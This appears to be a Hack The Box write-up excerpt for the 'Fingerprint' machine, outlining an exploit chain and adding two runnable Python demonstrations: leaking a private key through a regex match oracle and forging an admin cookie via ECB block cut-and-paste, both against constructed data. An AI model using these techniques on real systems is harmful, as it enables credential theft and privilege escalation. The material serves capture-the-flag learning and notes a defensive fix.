Machine Synopsis
Fingerprint is an insane-difficulty Linux machine that focuses mainly on web vulnerabilities (HQL injection, Cross-Site Scripting and Java deserialization with a custom gadget chain), with some additional focus on cryptography. The initial foothold chains several steps across two separate web applications: HQL injection and XSS are exploited to bypass multi-factor authentication and reach a page where serialized Java data can be uploaded; path traversal is then used to read the Flask source code and obtain the application secret, which allows forging JWT tokens that trigger deserialization of the uploaded data, leading to remote code execution. Lateral movement relies on a setuid binary that matches regular expressions against files, which allows the user's private SSH key to be brute-forced. Finally, privileges are escalated through a local development version of the initial web application (still vulnerable to arbitrary file read via directory traversal) that now encrypts its cookie. Because the cookie is encrypted in the insecure ECB mode, an administrative cookie can be forged, granting access to the vulnerable page where `root`'s private key file can be read and ultimately resulting in an interactive shell with `root` privileges.
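The synopsis says the lateral-movement step brute-forces a private key through a setuid binary that matches regular expressions against files, without describing the mechanism. The following is an added example, not code from the machine or from Hack The Box: it models such a binary as a hypothetical boolean oracle (`regex_oracle`, which only reports whether a pattern matches) and shows how an anchored, escaped prefix turns that single bit into a character-by-character leak of the whole file. The key file contents are constructed and are not a real key; the oracle function and alphabet are assumptions.

```python
import re
import string

# Constructed stand-in for the target file (NOT a real key), used only so
# the example runs offline. In the real scenario this would be ~/.ssh/id_rsa.
SECRET_FILE = (
    "-----BEGIN OPENSSH PRIVATE KEY-----\n"
    "b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW\n"
    "-----END OPENSSH PRIVATE KEY-----\n"
)

# Hypothetical model of the setuid helper: it runs with the victim's
# privileges and answers only "matched" / "did not match", never printing
# the file. That one bit per query is enough to leak the file.
def regex_oracle(pattern: str, contents: str = SECRET_FILE) -> bool:
    return re.search(pattern, contents, re.DOTALL) is not None


# Characters expected in a PEM/OpenSSH key file: base64 alphabet, padding,
# the header/footer dashes and spaces, and newlines (assumption).
ALPHABET = string.ascii_letters + string.digits + "+/=-: \n"


def leak_file(oracle, max_len: int = 4096) -> str:
    """Recover a file one character at a time through a match/no-match oracle.

    Each query anchors at the start of the file (\\A) and tests whether the
    already-known prefix extended by one candidate character still matches.
    re.escape() keeps regex metacharacters in the key (+, /, -) literal.
    At most len(ALPHABET) queries are needed per recovered character.
    """
    known = ""
    while len(known) < max_len:
        for ch in ALPHABET:
            if oracle("\\A" + re.escape(known + ch)):
                known += ch
                break
        else:
            # No candidate extends the prefix: we have reached end of file
            # (or hit a character outside ALPHABET).
            return known
    return known


if __name__ == "__main__":
    recovered = leak_file(regex_oracle)
    print(recovered)
    print("complete:", recovered == SECRET_FILE)
```

Against a real binary the oracle would be a subprocess call whose exit status or output distinguishes a match from a miss; the prefix-anchoring logic is unchanged. If the target's alphabet is unknown, widen `ALPHABET` to all printable characters at the cost of more queries per position.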
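The privilege-escalation step in the synopsis forges an administrative cookie because the cookie is encrypted in ECB mode. The following is an added example, not code from the machine or from Hack The Box, showing why that works: in ECB every 16-byte block is encrypted independently, so a ciphertext block produced for attacker-chosen input can be cut from one cookie and pasted into another. The block cipher here is a toy keyed Feistel construction (an assumption, standing in for AES so the example needs no third-party library), the cookie layout `user=<name>;role=<role>` and the `KEY` value are constructed, and the attack assumes the application does not reject non-printable bytes in the username.

```python
import hashlib

BLOCK = 16


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(half: bytes, key: bytes, r: int) -> bytes:
    # Toy round function: keyed hash truncated to half a block. It stands in
    # for a real block cipher; the ECB weakness below does not depend on it.
    return hashlib.sha256(key + bytes([r]) + half).digest()[: BLOCK // 2]


def encrypt_block(block: bytes, key: bytes) -> bytes:
    # 4-round Feistel network over one 16-byte block.
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(r, key, i))
    return l + r


def decrypt_block(block: bytes, key: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(l, key, i)), l
    return l + r


def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK          # PKCS#7
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def ecb_encrypt(pt: bytes, key: bytes) -> bytes:
    # ECB: each block encrypted on its own, no chaining, no IV. Identical
    # plaintext blocks give identical ciphertext blocks wherever they sit.
    pt = pad(pt)
    return b"".join(encrypt_block(pt[i:i + BLOCK], key) for i in range(0, len(pt), BLOCK))


def ecb_decrypt(ct: bytes, key: bytes) -> bytes:
    return unpad(b"".join(decrypt_block(ct[i:i + BLOCK], key) for i in range(0, len(ct), BLOCK)))


KEY = b"constructed-server-secret"  # constructed; the attacker never learns it


def issue_cookie(username: bytes) -> bytes:
    # Server side (hypothetical cookie layout): the attacker controls only the
    # username, and the role is always "user".
    return ecb_encrypt(b"user=" + username + b";role=user", KEY)


def parse_cookie(cookie: bytes) -> dict:
    fields = ecb_decrypt(cookie, KEY).split(b";")
    return dict(f.split(b"=", 1) for f in fields)


def forge_admin_cookie(issue) -> bytes:
    # Attacker side: only needs the ability to obtain cookies for chosen names.
    # 1. "user=alice;role=" is exactly 16 bytes, so block 2 of this cookie is
    #    the role value "user" plus padding.
    c1 = issue(b"alice")
    # 2. Choose a username that pushes "admin" + valid PKCS#7 padding (11 bytes
    #    of 0x0b) into a block of its own: "user=" + 11 filler bytes fill block 1.
    c2 = issue(b"A" * 11 + b"admin" + bytes([11]) * 11)
    # 3. ECB cut-and-paste: keep block 1 of c1, replace the rest with block 2 of c2.
    #    The result decrypts to "user=alice;role=admin" with valid padding.
    return c1[:BLOCK] + c2[BLOCK:2 * BLOCK]


if __name__ == "__main__":
    print(parse_cookie(issue_cookie(b"alice")))
    print(parse_cookie(forge_admin_cookie(issue_cookie)))
```

The fix is not a stronger cipher but an authenticated construction: encrypt the cookie in an AEAD mode (AES-GCM or ChaCha20-Poly1305) or attach an HMAC over the ciphertext, so that any rearranged block fails verification before it is parsed.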
Machine Matrix